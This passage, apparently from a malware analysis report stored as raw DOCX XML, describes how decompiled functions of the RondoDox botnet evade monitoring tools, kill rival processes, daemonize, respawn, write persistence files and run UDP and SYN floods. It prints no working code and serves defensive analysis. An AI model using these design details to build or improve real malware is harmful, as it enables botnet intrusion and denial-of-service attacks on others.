      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses strstr (FUN_004147EC) to check if any tool name appears in the target string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Returns true if ANY tool is detected — used to avoid execution in monitored environments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The 11 encrypted strings at DAT_0051D2EC through DAT_0051CD42 likely decode to tools like: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">gdb, strace, ltrace, top, htop, tcpdump, wireshark, etc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Competition Killer (FUN_00403170) — CRITICAL DISCOVERY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Full decompilation revealed a massive competition elimination engine that was previously unidentified. This is one of the most significant functions in the binary (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">632 lines of decompiled code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Startup Decryption: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Decrypts approximately 80 encrypted strings at initialization using FUN_00402530 — the largest batch decryption in the entire binary. These strings are competitor malware names, mining tool names, and process identifiers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Continuous /proc Scanning: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Runs in an infinite loop, connecting to the system and iterating through /proc/[pid]/status files (DAT_0051cace = decrypted format string for /proc/%d/status path)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-Layer Process Matching: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">For each process, checks against 40+ entries from a lookup table (PTR_DAT_00419e80), comparing process name suffixes and binary paths. Also reads /proc/[pid]/cmdline to inspect command-line arguments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kill Mechanism: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sends SIGKILL (signal 9) via FUN_004112dc(pid, 9) to any process matching the kill list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Hidden File Detection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Checks for processes running from hidden paths (containing "/.") and kills them</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cmdline Analysis: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reads /proc/[pid]/cmdline, replaces null bytes with spaces, then checks against multiple encrypted string sets for known competitor command-line patterns. Strips known prefixes (e.g., interpreter paths) before matching.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">8 Decrypted Name Categories: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The function uses distinct arrays of decrypted names: file extensions to match (0x51c5e7-0x51c60d), competitor binary names (0x51c890-0x51c963), additional competitors (0x51c9f4-0x51ca97), and tool names to kill (0x51ca50-0x51cab7)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sleep Cycle: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sleeps 10 seconds (FUN_00417020(10000)) between scan cycles, then repeats indefinitely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This function ensures RondoDox has exclusive access to system resources. It also explains why top gets killed — both RondoDox AND Kinsing independently kill monitoring tools. The ~80 encrypted competitor names suggest RondoDox targets a wide range of known cryptominers, botnets, and security tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Daemonization (FUN_00405df0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implements proper Unix daemon creation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Double-fork pattern (fork, setsid, fork again) to detach from terminal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Redirects file descriptors 0/1/2 to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DAT_0051cca0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Closes stdin/stdout/stderr and reopens to /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ignores 9 signals: SIGTRAP(5), SIGTTOU(22), SIGTTIN(21), SIGTSTP(20), SIGHUP(1), SIGPIPE(13), SIGINT(2), SIGQUIT(3), SIGTERM(15)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The aggressive signal ignoring makes it extremely difficult to terminate RondoDox via standard kill signals. Only SIGKILL (9) bypasses these handlers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Watchdog/Respawner (FUN_00405f60)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitors the bot process and respawns it if killed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Forks child processes that run the competition killer (FUN_00403170)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Parent monitors child via waitpid; if child exits, calls FUN_00401f20 (watchdog fork) and recursively respawns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitors a PID file to verify the target process is running</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates a mutual monitoring chain: watchdog watches bot, bot watches watchdog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistence Writer (FUN_004028E0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Decrypts 4 encrypted strings and uses them to write persistence entries:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Decrypts DAT_0051D4A4 (7 bytes), DAT_0051CCC0 (28 bytes), DAT_0051CCE0 (26 bytes), DAT_0051D2AB (12 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Formats a path string using the decrypted values and a loop counter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Opens each formatted path for writing (fopen with "w" mode)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Writes the decrypted payload string to each file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Zeros all decrypted buffers after use to prevent memory forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This function likely writes crontab entries or init scripts for persistence. The 4 decrypted strings probably correspond to: a path template (e.g., /var/spool/cron/crontabs/%d), a format string, a command payload, and a comment marker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 Network Attack Functions (DDoS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ghidra identified multiple DDoS attack functions that use raw sockets (SOCK_RAW) with IP_HDRINCL for IP spoofing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UDP Flood (FUN_00400B40)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates UDP socket with random source port (0x8000 + rand() % 0x6E48)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sets socket to non-blocking (O_NONBLOCK | 0x800)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Floods target for specified duration using gettimeofday() timing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Resolves target via inet_aton (FUN_00414AD3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP SYN Flood (FUN_00401000)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates raw TCP socket (AF_INET, SOCK_RAW)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
